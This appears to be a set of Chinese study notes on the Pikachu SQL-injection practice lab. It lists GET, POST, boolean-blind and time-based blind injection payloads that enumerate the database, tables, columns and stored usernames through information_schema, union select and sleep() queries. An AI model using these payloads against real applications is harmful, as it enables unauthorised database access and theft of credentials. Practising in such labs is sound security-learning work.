一.get注入
1.输入'报错
2.万能密码试试(闭合或绕过' )等..)
' or 1=1 --qwe
1' or 1=1
1' and 1=1
1' or 1=1 -- qwe
1' and 1=1 -- qwe
' or '1'='1
3.order by 判断字段数
1' or 1=1 order by 2 -- qwe
(2不报错,3报错,字节数为2)
4.判断显错位
1' and 1=2 union select 1,2 -- qwe
两个都是显错位
5.查询库名,版本信息(MySQL只有5.0以上才有自带information_schema库)
1' and 1=2 union select database(),version() -- qwe
6.查询表名
1' and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() -- qwe
username一般在users表里
7.查询列名
1' and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='users' -- qwe
8.查username
1' and 1=2 union select username,password from users -- qwe
第一次做这种题,惯性思维以为要找flag,搞了很久,把一半数据都访问了一遍,后来才想明白找到username就行了。
二.post注入
抓包
or 1=1
注:bp不能抓本地的包,将127.0.0.1改为自己的ip地址就可抓
三.布尔盲注
看提示有个admin用户,尝试用它搞不起,搜索看到kobe可以用(不理解为啥admin不行,并且将以下代码中and改为or也不行)
1.kobe' and 1=1 #
kobe' and 1=1 -- qwe
2.库名长度
kobe' and length(database())=7 #
3. 抓包跑库名
kobe' and ascii(substr(database(),1,1))=222 #
pikachu 库
4.表名长度 注意不是第一个表!(这里要尝试,看表名分别是啥)
kobe' and length((select table_name from information_schema.tables where table_schema=database() limit 3,1))=5 #
5.表名
kobe' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1))=222 #
users
6.列名长度
kobe' and length(((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1)))=8 #
7.列名
kobe' and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),1,1))=222 #
username
8.查询
kobe' and length((select username from users limit 0,1))=5 #
kobe' and ascii(substr((select username from users limit 0,1),1,1))=222 #
admin
kobe' and length((select username from users limit 1,1))=7 #
kobe' and ascii(substr((select username from users limit 1,1),1,1))=222 #
pikachu
...
四.延时盲注 ??
1.
' or if(1=1,sleep(5),1) -- qwe
2.库名
' or if(length(database())=7,sleep(5),1) -- qwe
' or if(ascii(substr(database(),2,1))=1122,sleep(2),1) -- qwe 抓包
jiiiiii
3.表名
' or if(length((select table_name from information_schema.tables where table_schema=database() limit 1,1))>1,sleep(1),1) -- qwe
' or if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=1111,sleep(2),1) -- qwe
8
uuupttt
6
4.列名
' or if(length((select column_name from information_schema.columns where table_schema=database() and table_name='' limit 0,1))>1,sleep(2),1) -- qwe
' or if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='' limit 0,1),1,1))=1111,sleep(2),1) -- qwe